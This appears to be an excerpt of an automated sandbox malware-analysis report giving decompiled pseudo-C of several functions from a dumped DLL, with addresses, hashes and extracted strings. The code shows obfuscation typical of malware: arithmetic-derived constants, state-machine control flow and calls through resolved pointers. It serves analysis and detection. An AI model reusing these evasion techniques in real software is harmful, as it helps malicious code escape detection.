				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t106;
				void* _t118;
				void* _t123;
				void* _t125;
				intOrPtr _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				void* _t148;

				_push(_a8);
				_t141 = _a4;
				_t123 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t106);
				_v80 = 0x2da5ed;
				_t148 = _t147 + 0x10;
				_t142 = 0;
				_v76 = 0;
				_t125 = 0x345de67e;
				_v72 = 0;
				_v100 = 0x5d99;
				_t143 = 9;
				_v100 = _v100 / _t143;
				_v100 = _v100 + 0x3ccb;
				_v100 = _v100 ^ 0x0000340e;
				_v84 = 0xb7f0;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0x00004e6b;
				_v104 = 0x2472;
				_v104 = _v104 << 0xb;
				_v104 = _v104 | 0x2ee3a515;
				_v104 = _v104 ^ 0x2fe3eebe;
				_v108 = 0xd2e1;
				_v108 = _v108 + 0xffff0d62;
				_t144 = 0x14;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x0cccdcb2;
				_v112 = 0x5926;
				_v112 = _v112 + 0xdeb5;
				_v112 = _v112 << 6;
				_v112 = _v112 << 0xc;
				_v112 = _v112 ^ 0xdf6c425e;
				_v96 = 0x379b;
				_v96 = _v96 << 1;
				_t145 = 0x6d;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x001e434e;
				_v116 = 0x863a;
				_v116 = _v116 * 0x52;
				_v116 = _v116 + 0xffff0085;
				_v116 = _v116 + 0x7cb6;
				_v116 = _v116 ^ 0x002a75a4;
				_v120 = 0x5588;
				_v120 = _v120 / _t145;
				_v120 = _v120 << 1;
				_v120 = _v120 << 3;
				_v120 = _v120 ^ 0x00002108;
				_v88 = 0xce65;
				_v88 = _v88 ^ 0x25948ee5;
				_v88 = _v88 * 0x2e;
				_v88 = _v88 ^ 0xc0a3e1fe;
				_v92 = 0x75c8;
				_v92 = _v92 + 0x1df4;
				_v92 = _v92 + 0xffff92c4;
				_v92 = _v92 ^ 0x00004c1f;
				do {
					while(_t125 != 0x128fa6f3) {
						if(_t125 == 0x1c314bcc) {
							E1000FEE3(_t123,  &_v68, _v100, _v84, _v104, _v108);
							_t148 = _t148 + 0x10;
							_t125 = 0x128fa6f3;
							continue;
						} else {
							if(_t125 == 0x1efca616) {
								__eflags = E1000BAA2( &_v68, _v88, _v92, _t141 + 8);
								_t142 =  !=  ? 1 : _t142;
							} else {
								if(_t125 != 0x345de67e) {
									goto L10;
								} else {
									_t125 = 0x1c314bcc;
									continue;
								}
							}
						}
						L13:
						return _t142;
					}
					_t118 = E1000F914(_v112, _v96, __eflags, _v116, _t141, _v120,  &_v68);
					_t148 = _t148 + 0x10;
					__eflags = _t118;
					if(__eflags == 0) {
						_t125 = 0xd121e29;
						goto L10;
					} else {
						_t125 = 0x1efca616;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t125 - 0xd121e29;
				} while (__eflags != 0);
				goto L13;
			}

0x1000bb9d
0x1000bba4
0x1000bbab
0x1000bbad
0x1000bbae
0x1000bbaf
0x1000bbb0
0x1000bbb5
0x1000bbbd
0x1000bbc0
0x1000bbc4
0x1000bbc8
0x1000bbcd
0x1000bbd1
0x1000bbdf
0x1000bbe4
0x1000bbea
0x1000bbf2
0x1000bbfa
0x1000bc02
0x1000bc07
0x1000bc0f
0x1000bc17
0x1000bc1c
0x1000bc24
0x1000bc2c
0x1000bc34
0x1000bc40
0x1000bc45
0x1000bc4b
0x1000bc53
0x1000bc5b
0x1000bc63
0x1000bc68
0x1000bc6d
0x1000bc75
0x1000bc7d
0x1000bc86
0x1000bc87
0x1000bc8b
0x1000bc93
0x1000bca0
0x1000bca4
0x1000bcac
0x1000bcb4
0x1000bcbc
0x1000bccf
0x1000bcd3
0x1000bcd7
0x1000bcdc
0x1000bce4
0x1000bcec
0x1000bcf9
0x1000bcfd
0x1000bd05
0x1000bd0d
0x1000bd15
0x1000bd1d
0x1000bd25
0x1000bd25
0x1000bd2f
0x1000bd5b
0x1000bd60
0x1000bd63
0x00000000
0x1000bd31
0x1000bd37
0x1000bdbd
0x1000bdbf
0x1000bd39
0x1000bd3f
0x00000000
0x1000bd41
0x1000bd41
0x00000000
0x1000bd41
0x1000bd3f
0x1000bd37
0x1000bdc3
0x1000bdcb
0x1000bdcb
0x1000bd80
0x1000bd85
0x1000bd88
0x1000bd8a
0x1000bd93
0x00000000
0x1000bd8c
0x1000bd8c
0x00000000
0x1000bd8c
0x00000000
0x1000bd98
0x1000bd98
0x1000bd98
0x00000000

Strings

r$, xrefs: 1000BC0F
~]4, xrefs: 1000BD39
&Y, xrefs: 1000BC53
~]4, xrefs: 1000BBC8
kN, xrefs: 1000BC07

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: &Y$kN$r$$~]4$~]4
API String ID: 0-4213572440
Opcode ID: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
Instruction ID: 370723299a530a5d93a3d6758ab60c064ac6dab2877617b008111ab0697a905a
Opcode Fuzzy Hash: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
Instruction Fuzzy Hash: 8F515371508741AFE354CF21C88982FFBE1FBD8B98F404A1EF585562A4D3B5CA49CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10011F88 Relevance: 6.4, Strings: 5, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10011F88() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				char* _t108;
				void* _t113;
				signed int _t116;
				signed int _t127;
				short* _t128;
				signed int* _t131;

				_t131 =  &_v560;
				_v532 = 0xdf77;
				_v532 = _v532 | 0xf1b1db65;
				_t113 = 0x2283ac23;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x03c6ff13;
				_v544 = 0xdd97;
				_v544 = _v544 >> 0xb;
				_v544 = _v544 ^ 0x7831024e;
				_v544 = _v544 ^ 0x78315e83;
				_v536 = 0xeb3d;
				_v536 = _v536 << 4;
				_v536 = _v536 ^ 0x56aecc65;
				_v536 = _v536 ^ 0x56a04d5b;
				_v524 = 0x8c08;
				_v524 = _v524 | 0x5902e3b1;
				_v524 = _v524 ^ 0x5902aa3b;
				_v552 = 0xfdc1;
				_v552 = _v552 * 0x29;
				_t127 = 0x1d;
				_v552 = _v552 * 0x66;
				_v552 = _v552 / _t127;
				_v552 = _v552 ^ 0x008eebdb;
				_v556 = 0x4ae2;
				_v556 = _v556 + 0xffff2c78;
				_v556 = _v556 + 0xdee6;
				_v556 = _v556 >> 0x10;
				_v556 = _v556 ^ 0x000006e5;
				_v528 = 0xfda8;
				_v528 = _v528 << 0xf;
				_v528 = _v528 ^ 0x7ed4787e;
				_v540 = 0xbfac;
				_v540 = _v540 >> 7;
				_t128 = _v528;
				_v540 = _v540 * 0x19;
				_v540 = _v540 ^ 0x00004b65;
				_v560 = 0xd500;
				_v560 = _v560 * 0x6a;
				_v560 = _v560 >> 3;
				_v560 = _v560 + 0x9ecd;
				_v560 = _v560 ^ 0x000bcd88;
				L1:
				while(_t113 != 0xb1bd1f2) {
					if(_t113 == 0x109d50bf) {
						_push(_t113);
						_t108 = E1000DFD8(_v532,  &_v520, __eflags, _v544, _v536);
						_t131 =  &(_t131[3]);
						_t113 = 0x26f0d27d;
						continue;
					} else {
						if(_t113 == 0x2283ac23) {
							_t113 = 0x109d50bf;
							continue;
						} else {
							if(_t113 == 0x26f0d27d) {
								_v548 = 0x7bf9;
								_t116 = 0x44;
								_v548 = _v548 / _t116;
								_v548 = _v548 << 0xb;
								_v548 = _v548 ^ 0x000e9002;
								_t128 =  &_v520 + E1001232B(_v524,  &_v520, _v552) * 2;
								while(1) {
									_t108 =  &_v520;
									if(_t128 <= _t108) {
										break;
									}
									__eflags =  *_t128 - 0x5c;
									if( *_t128 != 0x5c) {
										L8:
										_t128 = _t128 - 2;
										__eflags = _t128;
										continue;
									} else {
										_t88 =  &_v548;
										 *_t88 = _v548 - 1;
										__eflags =  *_t88;
										if( *_t88 == 0) {
											__eflags = _t128;
										} else {
											goto L8;
										}
									}
									L12:
									_t113 = 0xb1bd1f2;
									goto L1;
								}
								goto L12;
							}
						}
					}
					L16:
					__eflags = _t113 - 0x20ed6828;
					if(__eflags != 0) {
						continue;
					}
					return _t108;
				}
				__eflags =  *0x10021088 + 0x38;
				E100103F1(_v556, _v528, _t128,  *0x10021088 + 0x38, _v540, _v560);
				_t131 =  &(_t131[4]);
				_t113 = 0x20ed6828;
				goto L16;
			}

0x10011f88
0x10011f8e
0x10011f98
0x10011fa0
0x10011fa5
0x10011faa
0x10011fb2
0x10011fba
0x10011fbf
0x10011fc7
0x10011fcf
0x10011fd7
0x10011fdc
0x10011fe4
0x10011fec
0x10011ff4
0x10011ffc
0x10012004
0x10012015
0x1001202a
0x10012030
0x1001203a
0x1001203e
0x10012046
0x1001204e
0x10012056
0x1001205e
0x10012063
0x1001206b
0x10012073
0x10012078
0x10012080
0x10012088
0x10012092
0x10012096
0x1001209a
0x100120a2
0x100120af
0x100120b3
0x100120b8
0x100120c0
0x00000000
0x100120c8
0x100120d2
0x10012147
0x10012158
0x1001215d
0x10012160
0x00000000
0x100120d4
0x100120da
0x10012143
0x00000000
0x100120dc
0x100120de
0x100120e4
0x100120f4
0x100120fb
0x100120ff
0x10012104
0x1001211e
0x10012132
0x10012132
0x10012138
0x00000000
0x00000000
0x10012123
0x10012127
0x1001212f
0x1001212f
0x1001212f
0x00000000
0x10012129
0x10012129
0x10012129
0x10012129
0x1001212d
0x1001213c
0x00000000
0x00000000
0x00000000
0x1001212d
0x1001213f
0x1001213f
0x00000000
0x1001213f
0x00000000
0x1001213a
0x100120de
0x100120da
0x1001218e
0x1001218e
0x10012194
0x00000000
0x00000000
0x100121a4
0x100121a4
0x10012178
0x10012181
0x10012186
0x10012189
0x00000000

Strings

(h , xrefs: 10012189
(h , xrefs: 1001218E
=, xrefs: 10011FCF
J, xrefs: 10012046
eK, xrefs: 1001209A

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (h $(h $=$eK$J
API String ID: 0-3161474748
Opcode ID: c17adb24ed15b124d6c4925da14439c40e9f3fbb42135f2e49f054da85f1b1b7
Instruction ID: e8a67a67e04e8a9066f0d5eb1bd95932efa8ab7b433cf88c298fa75b40ae3c36
Opcode Fuzzy Hash: c17adb24ed15b124d6c4925da14439c40e9f3fbb42135f2e49f054da85f1b1b7
Instruction Fuzzy Hash: D55166B15083429BD759CF20C88540FBBE1FBE4758F504D1EF5969A2A0D3B4DA9ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 10018A33 Relevance: 6.4, Strings: 5, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10018A33(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t116;
				signed int _t118;
				int _t123;
				void* _t126;
				signed int _t127;
				signed int _t129;
				signed int _t134;
				void* _t145;
				void* _t149;
				signed int _t151;

				_v48 = 0xf279;
				_v48 = _v48 | 0xff7f3bd7;
				_v48 = _v48 + 0xffffb664;
				_v48 = _v48 ^ 0xff7fb26b;
				_v52 = 0xdfc5;
				_v52 = _v52 | 0x672e76b1;
				_v52 = _v52 >> 6;
				_v52 = _v52 << 0xe;
				_v52 = _v52 ^ 0x2effc010;
				_v28 = 0x717b;
				_t149 = __ecx;
				_v28 = _v28 * 0x13;
				_t129 = 0x2b;
				_v28 = _v28 * 0x77;
				_v28 = _v28 ^ 0x03ea435f;
				_v16 = 0x5e90;
				_v16 = _v16 + 0x8fca;
				_v16 = _v16 ^ 0x0000ee4a;
				_v20 = 0x9c59;
				_v20 = _v20 ^ 0x54a83331;
				_v20 = _v20 ^ 0x54a8d08f;
				_v36 = 0x2be7;
				_v36 = _v36 | 0xf6bdff7f;
				_v36 = _v36 ^ 0xf6bda7e3;
				_v32 = 0x6479;
				_v32 = _v32 << 6;
				_v32 = _v32 * 0x13;
				_v32 = _v32 ^ 0x01dd2cd3;
				_v40 = 0x51fb;
				_v40 = _v40 + 0x7aab;
				_v40 = _v40 + 0xd6ea;
				_v40 = _v40 + 0xc8ce;
				_v40 = _v40 ^ 0x000230c3;
				_v8 = 0x432;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x000148ae;
				_v24 = 0xb7c8;
				_v24 = _v24 * 0x18;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x9d6067a0;
				_v12 = 0x7924;
				_t59 =  &_v12; // 0x7924
				_v12 =  *_t59 / _t129;
				_v12 = _v12 ^ 0x0000718b;
				_v44 = 0x1703;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x24440fa6;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x91103eb4;
				_v4 = E1000A156();
				_t126 = _v48 + E1000A156() % _v52;
				_t116 = E1000A156();
				_t118 = _v44;
				_t151 = _v28 + _t116 % _v16;
				if(_t118 < _t126) {
					_t127 = _t126 - _t118;
					_t145 = _t149;
					_t134 = _t127 >> 1;
					_t123 = memset(_t145, 0x2d002d, _t134 << 2);
					asm("adc ecx, ecx");
					_t149 = _t149 + _t127 * 2;
					memset(_t145 + _t134, _t123, 0);
				}
				E1001087B(_t149, _v40, _v8, _t151, _v24, 3,  &_v4, _v12);
				 *((short*)(_t149 + _t151 * 2)) = 0;
				return 0;
			}

0x10018a36
0x10018a40
0x10018a48
0x10018a50
0x10018a58
0x10018a5f
0x10018a66
0x10018a6a
0x10018a6e
0x10018a75
0x10018a85
0x10018a87
0x10018a92
0x10018a93
0x10018a97
0x10018a9f
0x10018aa7
0x10018aaf
0x10018ab7
0x10018abf
0x10018ac7
0x10018acf
0x10018ad7
0x10018adf
0x10018ae7
0x10018aef
0x10018af9
0x10018afd
0x10018b05
0x10018b0d
0x10018b15
0x10018b1d
0x10018b25
0x10018b2d
0x10018b3a
0x10018b3e
0x10018b46
0x10018b53
0x10018b57
0x10018b5c
0x10018b64
0x10018b6c
0x10018b72
0x10018b76
0x10018b7e
0x10018b86
0x10018b8b
0x10018b93
0x10018b98
0x10018ba9
0x10018bc6
0x10018bc8
0x10018bd9
0x10018bdd
0x10018be1
0x10018be3
0x10018bed
0x10018bef
0x10018bf1
0x10018bf3
0x10018bf5
0x10018bf8
0x10018bfb
0x10018c16
0x10018c20
0x10018c2a

Strings

+, xrefs: 10018ACF
yd, xrefs: 10018AE7
$yJ, xrefs: 10018B6C
J, xrefs: 10018AAF
{q, xrefs: 10018A75

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $yJ$J$yd${q$+
API String ID: 0-1056812311
Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
Instruction ID: ed20fc3c254ec04a71c337705e8e66cd683667d4f09b4c71d4debe9d4c01e861
Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
Instruction Fuzzy Hash: E851017050D341ABD348DF24D98941BFBE1FBC8748F909A1DF0DA962A1C3B49A59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1000FFBA Relevance: 6.4, Strings: 5, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000FFBA(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v588;
				void* _t119;
				signed int _t127;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0x26646a;
				_v36 = 0x19d7;
				_v36 = _v36 ^ 0x575cc756;
				_v36 = _v36 ^ 0x575cd0df;
				_v12 = 0x27d2;
				_t127 = 0x61;
				_v12 = _v12 / _t127;
				_v12 = _v12 ^ 0x9e7a6cb1;
				_v12 = _v12 + 0x91e2;
				_v12 = _v12 ^ 0x9e7ab2a5;
				_v24 = 0x1208;
				_v24 = _v24 << 8;
				_v24 = _v24 + 0xff06;
				_v24 = _v24 ^ 0x00133f87;
				_v56 = 0x4c40;
				_v56 = _v56 + 0xffffbb62;
				_v56 = _v56 ^ 0x00002706;
				_v44 = 0x6bda;
				_v44 = _v44 | 0x742987e1;
				_v44 = _v44 ^ 0x7429f52a;
				_v28 = 0x57ee;
				_v28 = _v28 >> 1;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x00003c46;
				_v52 = 0x4743;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 ^ 0x00003729;
				_v16 = 0xad1b;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 | 0xb72f12c0;
				_v16 = _v16 ^ 0xb72f244f;
				_v32 = 0x1354;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00006891;
				_v20 = 0xf00c;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 << 0xa;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x00003ff0;
				_v8 = 0xa5dc;
				_v8 = _v8 ^ 0x3adce6d7;
				_v8 = _v8 | 0x37424e68;
				_t83 =  &_v8; // 0x37424e68
				_v8 =  *_t83 * 0x24;
				_v8 = _v8 ^ 0xfb433705;
				_v48 = 0xf651;
				_v48 = _v48 << 0xf;
				_v48 = _v48 ^ 0x7b288bd6;
				_v40 = 0xf298;
				_v40 = _v40 * 0x22;
				_v40 = _v40 ^ 0x002053ff;
				_t119 = E1000BDCC( *0x10021088 + 0x38, _v36, _v12, _v24);
				_t140 = _a4 + 0x2c;
				if(E10007F4B(_t119, _v56, _a4 + 0x2c, _v44, _v28) != 0) {
					E100035FC(_t140, _v52, _v16, _v32,  &_v588, _v20, _a8);
					E1000EB1E(_v8, _v48, _v40,  &_v588);
				}
				return 1;
			}

0x1000ffc3
0x1000ffc9
0x1000ffcd
0x1000ffd4
0x1000ffdb
0x1000ffe2
0x1000ffe9
0x1000fff6
0x1000fff9
0x1000fffc
0x10010003
0x1001000a
0x10010011
0x10010018
0x1001001c
0x10010023
0x1001002a
0x10010031
0x10010038
0x1001003f
0x10010046
0x1001004d
0x10010054
0x1001005b
0x1001005e
0x10010062
0x10010069
0x10010070
0x10010074
0x1001007b
0x10010082
0x10010086
0x1001008a
0x10010091
0x10010098
0x1001009f
0x100100a3
0x100100a7
0x100100ae
0x100100b5
0x100100b9
0x100100bd
0x100100c1
0x100100c8
0x100100cf
0x100100d6
0x100100dd
0x100100e1
0x100100e4
0x100100eb
0x100100f2
0x100100f6
0x100100fd
0x10010108
0x1001010b
0x10010124
0x10010137
0x10010145
0x1001015f
0x10010174
0x10010179
0x10010183

Strings

hNB7, xrefs: 100100DD
@L, xrefs: 1001002A
jd&, xrefs: 1000FFCD
)7, xrefs: 10010074
F<, xrefs: 10010062

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )7$@L$F<$hNB7$jd&
API String ID: 0-2568215416
Opcode ID: d2e5ea12b6135d2a65aeefac9571f54879caa13b5a3462fa870d04ede6d13cf1
Instruction ID: aa509fe134007520f5a48a788034166065c999b1642fd37c3221768287c478ab
Opcode Fuzzy Hash: d2e5ea12b6135d2a65aeefac9571f54879caa13b5a3462fa870d04ede6d13cf1
Instruction Fuzzy Hash: 915100B1D0121EABEF45DFE0D94A4EEBBB1FB04308F208198D411B62A1D7B95A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000F369 Relevance: 6.3, Strings: 5, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E1000F369(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t76;
				void* _t78;
				intOrPtr* _t79;
				signed int _t82;
				intOrPtr _t93;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x596980;
				_v16 = 0xc974;
				_t82 = 0xd;
				_t93 = _a4;
				_v16 = _v16 * 0x36;
				_v16 = _v16 ^ 0xaf6efdbb;
				_v16 = _v16 ^ 0xaf44ac5b;
				_v28 = 0x3fde;
				_v28 = _v28 + 0x4220;
				_v28 = _v28 ^ 0x00009a54;
				_v12 = 0x436a;
				_v12 = _v12 + 0x6671;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x000031a0;
				_v32 = 0x47a5;
				_v32 = _v32 + 0x143f;
				_v32 = _v32 ^ 0x0000673a;
				_v8 = 0x9f04;
				_v8 = _v8 >> 2;
				_v8 = _v8 + 0xffffba35;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x00009ed5;
				_v36 = 0x79e2;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000012a7;
				_v24 = 0x1d1a;
				_v24 = _v24 / _t82;
				_v24 = _v24 + 0xffff8b37;
				_v24 = _v24 ^ 0xfffff957;
				_v20 = 0x427c;
				_v20 = _v20 ^ 0xbd8b340b;
				_v20 = _v20 * 0x3e;
				_v20 = _v20 ^ 0xe7c6e2bc;
				_t76 =  *((intOrPtr*)(_t93 + 0x18))( *((intOrPtr*)(_t93 + 8)), 1, 0);
				_t99 = _t76;
				if(_t76 != 0) {
					_push(0x10001050);
					_push(_v12);
					_t78 = E1001CF31(_v16, _v28, _t99);
					_push(_v8);
					_t95 = _t78;
					_push( *((intOrPtr*)(_t93 + 8)));
					_t79 = E10003938(_t78, _v32);
					if(_t79 != 0) {
						 *_t79();
					}
					E10010D6D(_v36, _v24, _v20, _t95);
				}
				return 0;
			}

0x1000f36f
0x1000f375
0x1000f37c
0x1000f38a
0x1000f38b
0x1000f38e
0x1000f391
0x1000f398
0x1000f39f
0x1000f3a6
0x1000f3ad
0x1000f3b4
0x1000f3bb
0x1000f3c2
0x1000f3c6
0x1000f3cd
0x1000f3d4
0x1000f3db
0x1000f3e2
0x1000f3e9
0x1000f3ed
0x1000f3f4
0x1000f3f8
0x1000f3ff
0x1000f406
0x1000f40a
0x1000f411
0x1000f41f
0x1000f422
0x1000f429
0x1000f430
0x1000f437
0x1000f444
0x1000f447
0x1000f451
0x1000f454
0x1000f456
0x1000f459
0x1000f45e
0x1000f467
0x1000f46c
0x1000f472
0x1000f474
0x1000f479
0x1000f483
0x1000f485
0x1000f485
0x1000f491
0x1000f498
0x1000f49f

Strings

|B, xrefs: 1000F430
y, xrefs: 1000F3FF
B, xrefs: 1000F3A6
qf, xrefs: 1000F3BB
:g, xrefs: 1000F3DB

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$:g$qf$|B$y
API String ID: 0-887352362
Opcode ID: 5df2157582326fb55720b02f92a269b05c32e2e591e3e39665b339c1f18cb0fc
Instruction ID: 66c55bfeb14e76bc7477169ad383f08dab0bb2287f98a094ce4279729bfb338e
Opcode Fuzzy Hash: 5df2157582326fb55720b02f92a269b05c32e2e591e3e39665b339c1f18cb0fc
Instruction Fuzzy Hash: 5B3112B1E0120AABEF04CFA1C94A9EEFBB1FF54314F208149D510B62A0D7B95B45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000D2DD Relevance: 5.2, Strings: 4, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1000D2DD() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t206;
				void* _t210;
				void* _t217;
				intOrPtr _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int* _t244;

				_t244 =  &_v1144;
				_v1056 = 0x1aa15c;
				_v1052 = 0x4d0cb0;
				_t217 = 0xcdcbb46;
				_v1048 = 0xec305;
				_t238 = 0;
				_v1044 = 0;
				_v1080 = 0xf4ee;
				_t239 = 0x37;
				_v1080 = _v1080 / _t239;
				_v1080 = _v1080 ^ 0x00001f1a;
				_v1136 = 0x65d1;
				_v1136 = _v1136 >> 7;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 | 0xb1d65351;
				_v1136 = _v1136 ^ 0xb1d66160;
				_v1092 = 0x9227;
				_v1092 = _v1092 ^ 0xf0d4d9ed;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x03c34d93;
				_v1064 = 0x7d06;
				_v1064 = _v1064 | 0x78b1f3a9;
				_v1064 = _v1064 ^ 0x78b19bbc;
				_v1076 = 0x3a45;
				_v1076 = _v1076 ^ 0x8b32e14f;
				_v1076 = _v1076 ^ 0x8b32a728;
				_v1084 = 0x40e7;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 ^ 0x000056c5;
				_v1140 = 0x14b6;
				_v1140 = _v1140 + 0x82db;
				_v1140 = _v1140 + 0xffff6955;
				_v1140 = _v1140 | 0xc7e9aa62;
				_v1140 = _v1140 ^ 0xc7e9d185;
				_v1068 = 0xe08d;
				_v1068 = _v1068 ^ 0x0cc611ab;
				_v1068 = _v1068 ^ 0x0cc6d2cf;
				_v1108 = 0x428e;
				_v1108 = _v1108 ^ 0x2aea69d2;
				_v1108 = _v1108 * 0x68;
				_v1108 = _v1108 ^ 0x6f218659;
				_v1100 = 0x24cb;
				_v1100 = _v1100 ^ 0x57e30eba;
				_v1100 = _v1100 << 0xe;
				_v1100 = _v1100 ^ 0xca9c0614;
				_v1116 = 0x3dd7;
				_v1116 = _v1116 + 0x57d7;
				_v1116 = _v1116 * 0x14;
				_v1116 = _v1116 ^ 0x000bfaaf;
				_v1104 = 0x5f98;
				_v1104 = _v1104 | 0xb14dd167;
				_v1104 = _v1104 ^ 0x023b643c;
				_v1104 = _v1104 ^ 0xb376dba6;
				_v1144 = 0x61d9;
				_v1144 = _v1144 + 0x900;
				_v1144 = _v1144 + 0x298f;
				_v1144 = _v1144 + 0x5e62;
				_v1144 = _v1144 ^ 0x0000cef3;
				_v1132 = 0xb8f7;
				_v1132 = _v1132 >> 0xa;
				_v1132 = _v1132 << 0xc;
				_v1132 = _v1132 | 0x7a068a91;
				_v1132 = _v1132 ^ 0x7a06e880;
				_v1060 = 0xb6ca;
				_v1060 = _v1060 | 0x34ba312c;
				_v1060 = _v1060 ^ 0x34bab1b7;
				_v1112 = 0x7535;
				_v1112 = _v1112 ^ 0xf4f555d1;
				_v1112 = _v1112 + 0x341f;
				_v1112 = _v1112 ^ 0xf4f507bd;
				_v1120 = 0xf80;
				_v1120 = _v1120 + 0xd656;
				_v1120 = _v1120 ^ 0x1fb6d00a;
				_v1120 = _v1120 ^ 0x1fb65e63;
				_v1128 = 0xca3d;
